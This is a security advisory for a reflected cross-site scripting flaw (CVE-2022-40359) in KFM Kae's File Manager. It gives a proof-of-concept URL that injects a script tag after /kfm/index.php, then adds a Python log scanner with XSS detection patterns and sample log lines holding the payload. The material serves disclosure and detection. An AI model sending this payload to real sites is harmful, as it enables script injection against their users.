KFM Kae's File Manager - ALL - Reflected Cross-Site Scripting (XSS)

2022.09.22
Risk: Low
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: KFM Kae's File Manager - ALL - Reflected Cross-Site Scripting (XSS)
# Exploit Author: Scott Sturrock 'ssturrock -at- protonmail -dot- com'
# Vendor Homepage: https://code.google.com/archive/p/kfm/downloads
# Software Link: https://code.google.com/archive/p/kfm/downloads
# Version: ALL
# Tested on: Linux, Windows
# CVE : CVE-2022-40359

Cross-site scripting (XSS) vulnerability in kfm through 1.4.7 via a crafted GET request to /kfm/index.php. The injected markup is supplied as extra path information after index.php and reflected back unencoded.

Visit the PoC URL in a browser:

https://{URL}/kfm/index.php/'%3CSCRIPT%3Ealert('XSS');%3C/SCRIPT%3E
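Because the payload rides in the path segment after /kfm/index.php, it lands in ordinary web-server access logs. The detector below is an added example written for this advisory, not code from the author or the kfm project: it extracts the request path from Combined Log Format lines, isolates the extra path information after /kfm/index.php, URL-decodes it (repeatedly, to catch double encoding) and flags script-like content. The log lines, IP addresses and the XSS_MARKERS heuristic are constructed assumptions for illustration.

```python
import re
from typing import List, Optional
from urllib.parse import unquote

# Combined Log Format keeps the method and path inside the quoted request field.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

# Heuristic markers for markup/script injection once the path is decoded (assumed, not exhaustive).
XSS_MARKERS = re.compile(r"<\s*/?\s*script|javascript:|on[a-z]+\s*=", re.IGNORECASE)

KFM_ENTRY = "/kfm/index.php"


def kfm_path_info(path: str) -> Optional[str]:
    """Return the decoded extra path information after /kfm/index.php, or None if the
    request did not reach that script. An empty string means no extra path info."""
    idx = path.lower().find(KFM_ENTRY)
    if idx == -1:
        return None
    extra = path[idx + len(KFM_ENTRY):].split("?", 1)[0]  # drop any query string
    decoded = extra
    for _ in range(3):  # peel off up to three layers of percent-encoding
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded


def is_suspicious(line: str) -> bool:
    """True when the request reached /kfm/index.php with script-like path info."""
    m = LOG_RE.search(line)
    if not m:
        return False
    info = kfm_path_info(m.group("path"))
    return bool(info) and XSS_MARKERS.search(info) is not None


def scan(lines: List[str]) -> List[str]:
    """Return the log lines worth escalating."""
    return [line for line in lines if is_suspicious(line)]


# Constructed sample log lines; the second mirrors the advisory's PoC path.
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Sep/2022:10:01:02 +0000] "GET /kfm/index.php HTTP/1.1" 200 512',
    '203.0.113.7 - - [22/Sep/2022:10:01:05 +0000] "GET /kfm/index.php/\'%3CSCRIPT%3Ealert(\'XSS\');%3C/SCRIPT%3E HTTP/1.1" 200 600',
    '198.51.100.9 - - [22/Sep/2022:10:02:00 +0000] "GET /kfm/index.php/%253Cscript%253E HTTP/1.1" 200 600',
    '198.51.100.9 - - [22/Sep/2022:10:03:00 +0000] "GET /kfm/index.php?dir=photos HTTP/1.1" 200 800',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("suspicious:", hit)
```

A reflected XSS only executes once a victim follows the link, so a hit here is evidence of probing or a delivered lure rather than proof of compromise; correlate with the responding status code and referrer before escalating.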

References:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40359


Copyright 2022, cxsecurity.com
